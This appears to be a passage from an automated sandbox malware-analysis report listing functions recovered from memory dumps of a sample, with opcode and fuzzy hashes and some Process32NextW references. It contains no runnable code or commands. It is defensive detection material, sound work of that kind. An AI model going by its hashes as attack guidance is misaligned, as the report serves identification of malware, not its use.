                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: acc97c9b94582f9f501ff7b517e7bb06e4e4d6eb778c7415bb17fd8d450bfe89
                                                        • Instruction ID: 621c9e2083f20d3c372a15c370337d1ab0f06d7678fbd489517574b757cd59a8
                                                        • Opcode Fuzzy Hash: acc97c9b94582f9f501ff7b517e7bb06e4e4d6eb778c7415bb17fd8d450bfe89
                                                        • Instruction Fuzzy Hash: 3C416DFB15D111BDB24281926F54AFFAB6EE6D3730B30C62BF817D6546E2C80A4D5132
                                                        Function 070E02D4 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: ee392f2add89da1c6b6913cc0ae0938d3e2a4249e1e9d07b90d78364d6b3708f
                                                        • Instruction ID: 684c6851f954dac93ce75c363eb6efae7fee85907170226cd0863f574003832d
                                                        • Opcode Fuzzy Hash: ee392f2add89da1c6b6913cc0ae0938d3e2a4249e1e9d07b90d78364d6b3708f
                                                        • Instruction Fuzzy Hash: 1F313BFB15D111BDB14281926B58AFFAB6EE2D3730B30C62BF817D5546E2C80B4D5132
                                                        Function 070E02F9 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: b03f7f34d41b408f097b68b4cb4f242ef20468f5bc2654b90c4d61330503aa3d
                                                        • Instruction ID: bb9c8fbd242b48be613fed9924df41dbcbb8c746b29842d63f7f63417415e277
                                                        • Opcode Fuzzy Hash: b03f7f34d41b408f097b68b4cb4f242ef20468f5bc2654b90c4d61330503aa3d
                                                        • Instruction Fuzzy Hash: 9D311AFB15D1107DB14281922F64AFBAB6EE2D3730B31C62BF817D5546E2C90B4D5132
                                                        Function 070E0307 Relevance: 1.7, APIs: 1, Instructions: 181COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 7e0cb3b75ac3271be934ec6a8ef5f1127d5b4e8e1374cafb1318647a108a79f2
                                                        • Instruction ID: fcdf3009f028f331c83c9d2cee26c6303e4b09aae4dba1bf8d68785f481ef849
                                                        • Opcode Fuzzy Hash: 7e0cb3b75ac3271be934ec6a8ef5f1127d5b4e8e1374cafb1318647a108a79f2
                                                        • Instruction Fuzzy Hash: EA313AEB15C110BCB14685926F64AFBAB2EE2D3730B30C62BF817D1546E2C90A4E5232
                                                        Function 070E03AB Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: a6f967ca0956ac222f8d2f506d18b39402cab4c4b77e20fc9337b35313be7766
                                                        • Instruction ID: e78e0eecf0a48056ae7e3361bf21b1157959ad6ac42392e3181bb569020605c7
                                                        • Opcode Fuzzy Hash: a6f967ca0956ac222f8d2f506d18b39402cab4c4b77e20fc9337b35313be7766
                                                        • Instruction Fuzzy Hash: 83314BEB19D1517CB14281922F14AFBAB6EE5C3730B31C62BF867D5946E2C90B4E6132
                                                        Function 070E0339 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 0a176bb633e6e83eea6e3db76d152a852f612ec7a25a631069b0a52a5601af30
                                                        • Instruction ID: 6c59826e29e628d6d5460b1a2119b147e82b162a357ad364e45ad1ae215924aa
                                                        • Opcode Fuzzy Hash: 0a176bb633e6e83eea6e3db76d152a852f612ec7a25a631069b0a52a5601af30
                                                        • Instruction Fuzzy Hash: BE315EFB15D1107DB14281916F64AFBAB6DE5C3730B31C62BF817D6546E2C90B4E5132
                                                        Function 070E0327 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 8037171bbc3b874c184b0dbd9a7d486f4bb4edbeb2eef59c5fd2cf6eb5c3d3a2
                                                        • Instruction ID: e3a0a6dd1a757464f277b0b8881050406cb288c057bf135a353f3301e3c06fc8
                                                        • Opcode Fuzzy Hash: 8037171bbc3b874c184b0dbd9a7d486f4bb4edbeb2eef59c5fd2cf6eb5c3d3a2
                                                        • Instruction Fuzzy Hash: DD311AEB19D1117DB14281922F58AFBAB6EE1D3730B31C62BF817D1546E2C90F4E6132
                                                        Function 070E0388 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: ed6437a8ce246f10a315dafc5cd62634aa215c0db38ea56df6169aafb4056ac6
                                                        • Instruction ID: 31cdb961a952cdba6390046ceb2204bc3ed5c6eb01ddc07507001913d05b1ea6
                                                        • Opcode Fuzzy Hash: ed6437a8ce246f10a315dafc5cd62634aa215c0db38ea56df6169aafb4056ac6
                                                        • Instruction Fuzzy Hash: 7621B6EB29D1117DB14281826F64AFBAB6EE1D3730B31C62BF817D1546E2C90E4E6132
                                                        Function 070E038B Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: fa1a010af8ac495952fe9d148bb9b4fe4ed1c671bbae493194ec581a354c5ef2
                                                        • Instruction ID: 1341b6c2f0b168789f13aaf3a8478a6525a767e54b4e30162b83c5b39da1e74c
                                                        • Opcode Fuzzy Hash: fa1a010af8ac495952fe9d148bb9b4fe4ed1c671bbae493194ec581a354c5ef2
                                                        • Instruction Fuzzy Hash: F921B5EB19D1107CB14281826F24AFBAB6EE1D3730B31C62BF817D2546E2C90E4E6132
                                                        Function 070E03C2 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 239914b7b58edc874487389bdd9191eec8dbe2b9984bcb191343d8703f4fed47
                                                        • Instruction ID: f48bf8f4e725b7dab29cfdeea6dc10254d6e10d8f791798e306d0272e7caa96a
                                                        • Opcode Fuzzy Hash: 239914b7b58edc874487389bdd9191eec8dbe2b9984bcb191343d8703f4fed47
                                                        • Instruction Fuzzy Hash: 1C21DBEB19D1107CB14291826F54AFBAB6EE1D3730B31C626F816D2947E2C90F4E6132
                                                        Function 070E0354 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: 52f33bea5760eb3f2021324e4b77dc052b7ab5bef975d6addaa9bc6f217a9a96
                                                        • Instruction ID: f3b06878a4660a321af047d5a92154ca546e8cbe8a345181c85a8a3fe406f9d3
                                                        • Opcode Fuzzy Hash: 52f33bea5760eb3f2021324e4b77dc052b7ab5bef975d6addaa9bc6f217a9a96
                                                        • Instruction Fuzzy Hash: 0E21A1EB14D2907DF20386916B68AFAAB7DE5D3234B30826BF416D6447E2C80B4D5232
                                                        Function 070E03F4 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Process32NextW.KERNEL32(?,?,?,?), ref: 070E0402
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        • Opcode ID: ea4b2b7dcb08be234479f4db4e6531362b6f4ca4cdba5c7a865b0b4de8683d64
                                                        • Instruction ID: 6f4b3fddcdbeaf0a45228b2fbb4436037921e686b31d9f67745376e675293ffd
                                                        • Opcode Fuzzy Hash: ea4b2b7dcb08be234479f4db4e6531362b6f4ca4cdba5c7a865b0b4de8683d64
                                                        • Instruction Fuzzy Hash: E511F8EB19D1117CB14281926F19AFBAB2EE1D3730B31C626F417D1847E2C94B4E2232
                                                        Function 070705A2 Relevance: .5, Instructions: 460COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9122510516cd0a41b2c40c7f7c4850bb04072e961dc8af0b149beb21f4b5fe05
                                                        • Instruction ID: 200af8810567dece914dd7ed9628039e97e4de8c12017303013994127df74250
                                                        • Opcode Fuzzy Hash: 9122510516cd0a41b2c40c7f7c4850bb04072e961dc8af0b149beb21f4b5fe05
                                                        • Instruction Fuzzy Hash: 14A1AFFB96C115BDF2028581AB54BFE676DE7C7730F308726F423E5502E2A80A49D539
                                                        Function 07070597 Relevance: .4, Instructions: 445COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4492b279b9a50ccaa183552294928bb101eab9cd87625d494a300ef009a54a5c
                                                        • Instruction ID: c0e2104240e5f290937ab06ef4ee799714754e8e359e7c8ef49a71d96b3d2845
                                                        • Opcode Fuzzy Hash: 4492b279b9a50ccaa183552294928bb101eab9cd87625d494a300ef009a54a5c
                                                        • Instruction Fuzzy Hash: AD918BFB96C115BDF2418181AB54BFE676EE3C7730F308726F423E5502E2A80A89D539
                                                        Function 070705F6 Relevance: .4, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed12a0c16758dd7bca58847eac1d5d57566b4ef2f688b73d15b0b5ba5d6c910a
                                                        • Instruction ID: 41e043796d4a5856671cb45a0316807012ec532ffa7942a59b243e9fac458090
                                                        • Opcode Fuzzy Hash: ed12a0c16758dd7bca58847eac1d5d57566b4ef2f688b73d15b0b5ba5d6c910a
                                                        • Instruction Fuzzy Hash: E5818DFB96C115BDB241C1856B54BFE676EE2C7730F30C72AF823E5502E2980A49D539
                                                        Function 07070644 Relevance: .4, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ae2736630cdd35dc8a463cde8220205a00e556371e52135222b52c4dbc2b42c
                                                        • Instruction ID: 171adecdafa7494817d845d59cfd502c2768efa6665ef1ab544325b818600914
                                                        • Opcode Fuzzy Hash: 5ae2736630cdd35dc8a463cde8220205a00e556371e52135222b52c4dbc2b42c
                                                        • Instruction Fuzzy Hash: 85819CFB96C115BDF241C181AB14BFE676EE2C7730F30872AF423E5502E2A80A49D539
                                                        Function 0707061A Relevance: .4, Instructions: 416COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2f6c6226616f019b1b8f7ee87de7547cf27b1939e1aeda92a81ac713d9b8d64
                                                        • Instruction ID: 50914e3aee0a1a6fe46ddc41f57ca01b97500ae35bec5fdcd881cd0b2c160583
                                                        • Opcode Fuzzy Hash: f2f6c6226616f019b1b8f7ee87de7547cf27b1939e1aeda92a81ac713d9b8d64
                                                        • Instruction Fuzzy Hash: 7E817DFB96C115BDB241C181AB54BFE676EE2C7730F30C72AF427E5502E2980A89D539
                                                        Function 0707062A Relevance: .4, Instructions: 414COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1caca35a25f2aec755cb10e28a10d3f7981e70bf3b5546d888a8121309b62486
                                                        • Instruction ID: bfc55a100cc299d10192d3faa7c2a5f286117e6ffc29dc7136fa3b547f305dab
                                                        • Opcode Fuzzy Hash: 1caca35a25f2aec755cb10e28a10d3f7981e70bf3b5546d888a8121309b62486
                                                        • Instruction Fuzzy Hash: 4D818CEB96C115BDB241C581AB54BFE676EE2C7730F30C726F423E5502E2A80A49D539
                                                        Function 07070668 Relevance: .4, Instructions: 406COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91d22aecd4c057d180116edb513fe8f74ed49e544a00fe087cb3216f6c233cb3
                                                        • Instruction ID: 8d5b9dae2278881232366d22134951f07c4115c30330e62bed263ccf0a335d76
                                                        • Opcode Fuzzy Hash: 91d22aecd4c057d180116edb513fe8f74ed49e544a00fe087cb3216f6c233cb3
                                                        • Instruction Fuzzy Hash: 54819EFB96C115BDB241C1856B54BFE676EE2C7730F30C72AF423E5502E2980A89D539
                                                        Function 070706ED Relevance: .4, Instructions: 393COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3b785dae730d8107c29869fe0e12a6f64030cce46504491778964f7473f4ea0
                                                        • Instruction ID: 16acffeec64072efd2405076474ad6a22bc2224fe3cecfd84e7ecc175facda62
                                                        • Opcode Fuzzy Hash: c3b785dae730d8107c29869fe0e12a6f64030cce46504491778964f7473f4ea0
                                                        • Instruction Fuzzy Hash: 3281ADEB96C115BDB242C1816B54BFF676EE2C7730F30C72AF427D5502E2980A49D539
                                                        Function 07070697 Relevance: .4, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 775f0b9f31dd283087df708e7a7c5e4e8085a0944fc4b7ecfe8ee005ab911ece
                                                        • Instruction ID: ea92909383cd2306d9a075168a5435a518aea3cc1b5d616d71399b91b1d1da8e
                                                        • Opcode Fuzzy Hash: 775f0b9f31dd283087df708e7a7c5e4e8085a0944fc4b7ecfe8ee005ab911ece
                                                        • Instruction Fuzzy Hash: A871BEFB96C115BDB242C1816B54BFE676EE2C7730F30C72AF423E5502E2A80A49D539
                                                        Function 070706A8 Relevance: .4, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3038efa9c3814cc5653b1022fd8facfac9ea2006cd4eb37a801a327e26f18146
                                                        • Instruction ID: 06bcff9497d71dd54bc5d09e9d970ee5ef171694982c5f22c23e977e62d57202
                                                        • Opcode Fuzzy Hash: 3038efa9c3814cc5653b1022fd8facfac9ea2006cd4eb37a801a327e26f18146
                                                        • Instruction Fuzzy Hash: A671ACEB86C115BDB241C581AB54BFE676EE2C7730F30C72AF823D5602E2990A49D539
                                                        Function 070706D7 Relevance: .4, Instructions: 375COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 196dfedd1ef43defd03f73adaecc278acf2dd9ee7f68747fa97dcf27612dec52
                                                        • Instruction ID: 966690db9fe5140166fc8ecf6c9c35fd8b5fc135c7bd7a50cd3357369540694d
                                                        • Opcode Fuzzy Hash: 196dfedd1ef43defd03f73adaecc278acf2dd9ee7f68747fa97dcf27612dec52
                                                        • Instruction Fuzzy Hash: 08719BFB96C115BDB241C5816B54BFE676EE2C7730F30872AF823E5502E2980A49D539
                                                        Function 0707070C Relevance: .4, Instructions: 365COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5e28ae69f4b15ec2956d45ed7a36a0f74864fece38da978e2c6fb35ef4eb401
                                                        • Instruction ID: 94ff5e456f962d37314db7998402266722367acdadc9984d1bf268645f68d993
                                                        • Opcode Fuzzy Hash: d5e28ae69f4b15ec2956d45ed7a36a0f74864fece38da978e2c6fb35ef4eb401
                                                        • Instruction Fuzzy Hash: 7771AAEB96C115BDB242C5816B54BFE676EE2C7730F30872AF823D5602E2990E49D139
                                                        Function 07070729 Relevance: .4, Instructions: 361COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66bd61c5da7369d579b6322e70210fc2e4a763c47940474afd28685098a9715d
                                                        • Instruction ID: cd073c512d8a33b06b5b71559bdbf444946fc99813ab5676dd5855b6f97cfadd
                                                        • Opcode Fuzzy Hash: 66bd61c5da7369d579b6322e70210fc2e4a763c47940474afd28685098a9715d
                                                        • Instruction Fuzzy Hash: 6D71CBFB96C115BCB241C5856B54AFF676EE2C7730F30C72AF823D6602E2980A49D139
                                                        Function 0707074A Relevance: .3, Instructions: 349COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60a0d81c9183767eaf7b3816b29a0fdf5c9fae3a928e0b5d49581319a68160b4
                                                        • Instruction ID: ff870dc42740caeea85eacef9d84a78015eb4666afe6f43a22163fee1147a73a
                                                        • Opcode Fuzzy Hash: 60a0d81c9183767eaf7b3816b29a0fdf5c9fae3a928e0b5d49581319a68160b4
                                                        • Instruction Fuzzy Hash: 4E618BEB96C115BCB242C5856B54AFE676EE2C7730F30C72AF827D5602E2980A49D139
                                                        Function 07070782 Relevance: .3, Instructions: 326COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c23d8f3eb7beb845e059ef78d1b46344dc6313b47a68b56745e4dc9adf32949
                                                        • Instruction ID: 9b625a5bc43261edb7ad3bb785031abb4fbbc0096bf2eb3f5b664b0d230a0c3d
                                                        • Opcode Fuzzy Hash: 2c23d8f3eb7beb845e059ef78d1b46344dc6313b47a68b56745e4dc9adf32949
                                                        • Instruction Fuzzy Hash: DA61BFFB86C115BDB241C6856B54AFE676EE2C7730F30872AF427D6602E2940E49D139
                                                        Function 07070774 Relevance: .3, Instructions: 325COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8dad17ff4c6034d1b86bd93e98b5fed16785ea97895b21822c7b80bf51f148e1
                                                        • Instruction ID: 438018b8736479210b8c1d853dda3b8827bea80b8ae97c528e1bac3c961d498c
                                                        • Opcode Fuzzy Hash: 8dad17ff4c6034d1b86bd93e98b5fed16785ea97895b21822c7b80bf51f148e1
                                                        • Instruction Fuzzy Hash: FE61BDEB86C115BCB242C5856B54AFE676EE2C7730F30C72BF827D5602E2940E49D139
                                                        Function 070707B3 Relevance: .3, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ab008d1918020651975b22f4dc608752047ac4738ffe43b8238f8a136032cc4
                                                        • Instruction ID: cc735c6ba0edd2a30cad2c638c3334e4c7f4315dc8d76252bdd459b1a3aba0e3
                                                        • Opcode Fuzzy Hash: 7ab008d1918020651975b22f4dc608752047ac4738ffe43b8238f8a136032cc4
                                                        • Instruction Fuzzy Hash: 2251B0EB86C115BCB242C6856B54AFE676EE2C7730F308727F827D6602E2940F49D179
                                                        Function 07070805 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10f9fe890c1d1bf62d90ff657ec3277a85a2698da240991b39136e6e35a4e32f
                                                        • Instruction ID: aa4fb4643fce3c5fcdf84d672aa334e0ccc9ebd69c62dcfafb5abb44a3c7e4bb
                                                        • Opcode Fuzzy Hash: 10f9fe890c1d1bf62d90ff657ec3277a85a2698da240991b39136e6e35a4e32f
                                                        • Instruction Fuzzy Hash: F851DFEB86D015BCB241C581AB54AFF676EE2C7330F308726F867E5602E2944F89D179
                                                        Function 0707081F Relevance: .3, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0dc1b04e2b6f2444285ca907fc7e8b27e4bf4121fdcc5c578a95c981a6d5aef2
                                                        • Instruction ID: 23de532d95547839d73f838d51fa909f45105617194a7c442fd49c810ee662d4
                                                        • Opcode Fuzzy Hash: 0dc1b04e2b6f2444285ca907fc7e8b27e4bf4121fdcc5c578a95c981a6d5aef2
                                                        • Instruction Fuzzy Hash: 9F51AEEB86D115BCB241C685AB50AFF672EE2C7330F308726F867D5602E2940F89D179
